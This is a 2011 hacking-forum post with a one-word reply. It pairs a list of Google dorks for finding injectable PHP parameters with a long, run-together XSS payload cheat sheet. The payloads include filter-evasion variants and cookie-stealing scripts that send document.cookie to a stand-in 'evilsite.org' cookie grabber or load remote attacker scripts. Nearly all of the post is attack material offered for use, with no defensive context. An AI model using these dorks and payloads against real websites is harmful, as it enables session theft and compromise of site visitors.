Jimmy Posted August 16, 2011 Report Share Posted August 16, 2011 XSS Dorksinurl:".php?cmd="inurl:".php?z="inurl:".php?q="inurl:".php?search="inurl:".php?query="inurl:".php?searchstring="inurl:".php?keyword="inurl:".php?file="inurl:".php?years="inurl:".php?txt="inurl:".php?tag="inurl:".php?max="inurl:".php?from="inurl:".php?author="inurl:".php?pass="inurl:".php?feedback="inurl:".php?mail="inurl:".php?cat="inurl:".php?vote="inurl:search.php?q=inurl:com_feedpostold/feedpost.php?url=inurl:scrapbook.php?id=inurl:headersearch.php?sid=inurl:/poll/default.asp?catid=inurl:/search_results.php?search=XSS Cheats'';!--"<XSS>=&{()}'>//\\,<'>">">"*"'); alert('XSS<script>alert(1);</script><script>alert('XSS');</script><IMG SRC="javascript:alert('XSS');"><IMG SRC=javascript:alert('XSS')><IMG SRC=JaVaScRiPt:alert('XSS')><IMG SRC=javascript:alert("XSS")><IMG """><SCRIPT>alert("XSS")</SCRIPT>"><script src="http://www.evilsite.org/cookiegrabber.php"></script><script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script><scr<script>ipt>alert('XSS');</scr</script>ipt><script>alert(String.fromCharCode(88,83,83))</script><img src=foo.png onerror=alert(/xssed/) /><style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style><? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?><marquee><script>alert('XSS')</script></marquee><IMG SRC=\"jav ascript:alert('XSS');\"><IMG SRC=\"jav ascript:alert('XSS');\"><IMG SRC=\"jav ascript:alert('XSS');\"><IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>"><script>alert(0)</script><script src=http://yoursite.com/your_files.js></script></title><script>alert(/xss/)</script></textarea><script>alert(/xss/)</script><IMG LOWSRC=\"javascript:alert('XSS')\"><IMG DYNSRC=\"javascript:alert('XSS')\"><font style='color:expression(alert(document.cookie))'><img src="javascript:alert('XSS')"><script language="JavaScript">alert('XSS')</script><body onunload="javascript:alert('XSS');"><body onLoad="alert('XSS');"[color=red' onmouseover="alert('xss')"]mouse over[/color]"/></a></><img src=1.gif onerror=alert(1)>window.alert("Bonjour !");<div style="x:expression((window.r==1)?'':eval('r=1;alert(String.fromCharCode(88,83,83));'))"><iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>"><script alert(String.fromCharCode(88,83,83))</script>'>><marquee><h1>XSS</h1></marquee>'">><script>alert('XSS')</script>'">><marquee><h1>XSS</h1></marquee><META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\"><META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"><script>var var = 1; alert(var)</script><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE><?='<SCRIPT>alert("XSS")</SCRIPT>'?><IMG SRC='vbscript:msgbox(\"XSS\")'>" onfocus=alert(document.domain) "> <"<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET><STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSSperl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > outperl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out<br size=\"&{alert('XSS')}\"><scrscriptipt>alert(1)</scrscriptipt></br style=a:expression(alert())></script><script>alert(1)</script>"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>[color=red width=expression(alert(123))][color]<BASE HREF="javascript:alert('XSS');//">Execute(MsgBox(chr(88)&chr(83)&chr(83)))<"></iframe><script>alert(123)</script><body onLoad="while(true) alert('XSS');">'"></title><script>alert(1111)</script></textarea>'"><script>alert(document.cookie)</script>'""><script language="JavaScript"> alert('X \nS \nS');</script></script></script><<<<script><>>>><<<script>alert(123)</script><html><noalert><noscript>(123)</noscript><script>(123)</script><INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">'></select><script>alert(123)</script>'>"><script src = 'http://www.site.com/XSS.js'></script>}</style><script>a=eval;b=alert;a(b(/XSS/.source));</script><SCRIPT>document.write("XSS");</SCRIPT>a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);='><script>alert("xss")</script><script+src=">"+src="http://yoursite.com/xss.js?69,69"></script><body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>src="http://www.site.com/XSS.js"></script>data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=!--" /><script>alert('xss');</script><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee>"><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee>'"></title><script>alert("XSS by \nxss")</script>><marquee><h1>XSS by xss</h1></marquee><img """><script>alert("XSS by \nxss")</script><marquee><h1>XSS by xss</h1></marquee><script>alert(1337)</script><marquee><h1>XSS by xss</h1></marquee>"><script>alert(1337)</script>"><script>alert("XSS by \nxss</h1></marquee>'"></title><script>alert(1337)</script>><marquee><h1>XSS by xss</h1></marquee><iframe src="javascript:alert('XSS by \nxss');"></iframe><marquee><h1>XSS by xss</h1></marquee> Quote Link to comment Share on other sites More sharing options...
rack202 Posted January 4, 2012 Report Share Posted January 4, 2012 nice:) Quote Link to comment Share on other sites More sharing options...